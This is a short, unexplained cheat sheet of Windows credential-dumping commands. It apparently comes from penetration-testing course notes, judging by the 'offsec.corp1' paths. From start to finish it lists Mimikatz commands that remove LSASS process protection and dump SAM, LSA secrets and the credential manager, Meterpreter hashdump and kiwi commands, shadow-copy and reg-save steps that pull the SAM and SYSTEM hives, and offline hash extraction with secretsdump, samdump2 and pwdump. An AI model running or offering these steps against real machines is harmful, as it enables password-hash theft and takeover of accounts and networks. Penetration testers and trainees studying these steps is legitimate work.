$env:computername
[wmi] "Win32_userAccount.Domain='',Name='Administrator'"
privilege::debug
token::elevate
!+
!processprotect /process:lsass.exe /remove
sekurlsa::credman
lsadump::sam
lsadump::secrets
privilege::debug
lsadump::lsa /patch
meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > lsa_dump_sam
meterpreter > lsa_dump_secrets
wmic shadowcopy call create Volume='C:\'
copy \\? C:\users\offsec.corp1\Downloads\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\system
reg save HKLM\sam C:\users\offsec.corp1\Downloads\sam
reg save HKLM\system C:\users\offsec.corp1\Downloads\system
impacket-secretsdump -system SYSTEM -sam SAM LOCAL
samdump2 SYSTEM SAM
python pwdump.py /home/kali/system /home/kali/sam